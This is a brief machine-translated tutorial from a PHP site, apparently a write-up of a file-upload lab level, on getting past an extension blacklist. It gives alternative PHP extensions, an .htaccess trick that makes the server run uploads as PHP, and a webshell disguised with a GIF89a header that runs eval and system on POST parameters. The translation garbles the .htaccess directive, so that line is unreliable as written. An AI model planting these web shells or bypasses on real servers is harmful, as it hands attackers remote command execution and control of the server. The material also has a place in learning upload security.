So umgehen Sie die Blacklist beim Hochladen von Dateien

不言
Freigeben: 2023-04-02 14:20:02
Original
6100 Leute haben es durchsucht

Dieser Artikel stellt hauptsächlich die Methode zum Umgehen der Blacklist durch das Hochladen von Dateien vor. Jetzt kann ich ihn mit Ihnen teilen.

Auf dieser Ebene geht es hauptsächlich um das Festlegen des Uploads Suffix. Das Einschränken von Suffixen wie ASP, PHP, JSP usw. und das Hochladen ist nicht zulässig.

Position 1: Diese Umgehungsmethode besteht darin, das Suffix in .php3, php5 usw. zu ändern. Hier ist die Blacklist-Überprüfung ('.asp', '.aspx', '.php', '.jsp') ) können wir PHP3, PHP5... und andere Suffixnamen hochladen, die vom Server analysiert werden können

Position 2: Schreiben Sie die Dateianalyseregeln neu, um sie zu umgehen

1. Laden Sie zuerst eine Datei mit dem Namen .htaccess mit folgendem Inhalt hoch:

SetHandler-Anwendung /x-httpd-php

2. 1.jpg-Skript hochladen

Inhalt:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>
Nach dem Login kopieren

<span   style="max-width:90%"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
Nach dem Login kopieren

Das Obige ist der gesamte Inhalt dieses Artikels. Ich hoffe, dass er für alle hilfreich ist Bitte kontaktieren Sie uns für weitere verwandte Inhalte. Folgen Sie der chinesischen PHP-Website!

Verwandte Empfehlungen:

PHP verwendet Azure Storage Blob zum Hochladen von Dateien

Einführung in das Nginx-Memcache-Caching

Das obige ist der detaillierte Inhalt vonSo umgehen Sie die Blacklist beim Hochladen von Dateien. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage
Über uns Haftungsausschluss Sitemap
Chinesische PHP-Website:Online-PHP-Schulung für das Gemeinwohl,Helfen Sie PHP-Lernenden, sich schnell weiterzuentwickeln!